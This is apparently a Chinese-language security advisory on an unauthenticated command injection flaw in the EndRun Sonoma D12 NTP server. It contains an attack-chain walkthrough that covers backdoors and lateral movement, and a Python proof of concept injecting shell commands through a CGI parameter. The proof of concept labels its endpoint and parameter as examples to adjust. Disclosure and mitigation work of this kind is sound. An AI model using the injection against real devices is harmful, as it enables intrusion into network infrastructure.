CVE-2025-60960 EndRun Sonoma D12 NTP服务器操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-60960

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EndRun Technologies Sonoma D12 Network Time Server (GPS)

漏洞概述

CVE-2025-60960是EndRun Technologies公司生产的Sonoma D12网络时间服务器（NTP）设备固件中存在的一个高危操作系统命令注入漏洞。该漏洞存在于固件版本F/W 6010-0071-000 Ver 4.00中，由安全研究团队xdiv-sec发现并报告。

Sonoma D12是一款高精度GPS网络时间服务器，广泛应用于企业网络、电信运营商、金融机构和政府部门的NTP时间同步场景。该设备通过网络提供时间同步服务，通常部署在网络基础设施的关键节点。

该漏洞允许远程攻击者在无需认证和无需用户交互的情况下，通过网络向设备注入并执行任意操作系统命令。攻击者可以利用此漏洞执行任意代码、引发拒绝服务攻击、提升权限以及获取敏感信息。CVSS 3.1评分为8.2分，属于高危级别，其向量为AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N，表明该漏洞通过网络即可利用，攻击复杂度低，无需任何权限或用户交互即可触发。

由于NTP服务器通常部署在网络基础设施的核心位置且具有较高权限，该漏洞的成功利用可能对整个网络的时间同步安全造成严重影响，影响依赖该服务器的所有下游设备和应用。

技术细节

该漏洞属于经典的操作系统命令注入（OS Command Injection）漏洞类型。攻击者通过构造包含恶意操作系统命令的输入数据，将其注入到设备Web管理界面或网络服务接口中。由于设备固件未能对用户输入进行充分的过滤和验证，恶意命令被拼接到系统调用中并以设备进程的权限执行。

具体利用方式如下：

1. 攻击者通过网络访问Sonoma D12设备的Web管理界面或API接口。
2. 在某个接受用户输入的参数（如网络配置参数、诊断参数或系统设置参数）中注入操作系统命令分隔符（如分号`;`、管道符`|`、反引号`` ` ``或`$(command)`等）。
3. 设备固件在处理该输入时，未对特殊字符进行转义或过滤，直接将其传递给系统shell执行。
4. 注入的命令以运行NTP服务的用户权限执行，攻击者可读取敏感配置文件、修改系统设置或植入后门。

该漏洞的危险性在于：
- 无需认证即可利用（PR:N），攻击门槛极低；
- 无需用户交互（UI:N），可自动化批量攻击；
- 网络可达即可触发（AV:N），暴露在公网的设备直接面临风险；
- 完整性影响为高（I:H），攻击者可篡改系统配置和固件；
- 由于NTP服务器的特殊地位，被攻陷的设备可被用作网络渗透的跳板。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过Shodan、Censys等网络空间搜索引擎或Nmap扫描，发现暴露在网络中的EndRun Sonoma D12 NTP服务器，识别其固件版本为F/W 6010-0071-000 Ver 4.00。

STEP 2

步骤2：漏洞探测

攻击者访问设备的Web管理界面，识别接受用户输入的参数（如网络配置、诊断工具等），并测试是否存在命令注入漏洞。

STEP 3

步骤3：命令注入

攻击者在易受攻击的参数中注入恶意操作系统命令（如分号后跟shell命令），由于固件未对输入进行过滤，恶意命令被传递给系统shell执行。

STEP 4

步骤4：权限提升与持久化

攻击者利用注入的命令获取设备shell访问权限，读取配置文件中的凭证信息，提升权限并植入持久化后门。

STEP 5

步骤5：横向移动

攻击者利用被攻陷的NTP服务器作为跳板，扫描内网中的其他设备，利用NTP服务器的信任关系进行横向移动，威胁整个网络基础设施的安全。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60960 - EndRun Sonoma D12 OS Command Injection PoC
# Vulnerability: OS Command Injection in Web Management Interface
# Affected: EndRun Sonoma D12 NTP Server F/W 6010-0071-000 Ver 4.00
# Researcher: xdiv-sec

import requests
import sys

TARGET = "http://<target-ip>"
# The vulnerable endpoint accepts user input that is passed to a system shell
# without proper sanitization, allowing OS command injection.

def exploit(command):
    """
    Inject OS commands through the vulnerable parameter.
    The vulnerable parameter is typically found in network configuration
    or diagnostic pages of the Sonoma D12 web interface.
    """
    # Example injection via command separator
    payload = f"127.0.0.1; {command}"

    # Adjust the endpoint and parameter based on the specific vulnerable interface
    url = f"{TARGET}/cgi-bin/ntp.cgi"
    params = {
        "hostname": payload,  # Example vulnerable parameter
    }

    try:
        response = requests.get(url, params=params, timeout=10)
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response:\n{response.text}")
    except Exception as e:
        print(f"[-] Error: {e}")


def verify():
    """Verify the vulnerability by injecting a benign command (e.g., id or uname -a)."""
    print("[*] Testing for CVE-2025-60960 - Sonoma D12 Command Injection")
    exploit("id")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
    verify()

影响范围

EndRun Sonoma D12 NTP Server F/W 6010-0071-000 Ver 4.00

防御指南

临时缓解措施

在等待官方补丁发布之前，建议采取以下临时缓解措施：1）将Sonoma D12 NTP服务器从公网隔离，限制仅内网可信IP访问管理界面；2）在网络边界防火墙中配置访问控制列表（ACL），阻断对设备Web管理端口（通常为80/443）的非授权访问；3）监控设备日志，查找异常的命令执行记录；4）如非必要，临时禁用设备的Web管理功能，仅保留NTP时间同步服务；5）对设备进行网络分段，将其放置在独立的VLAN中，限制横向移动风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60960
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60960
3 Details https://www.cvedetails.com/cve/CVE-2025-60960/
4 VulDB https://vuldb.com/cve/CVE-2025-60960
5 Link http://endrun.com
6 Link http://sonoma.com
7 Link https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12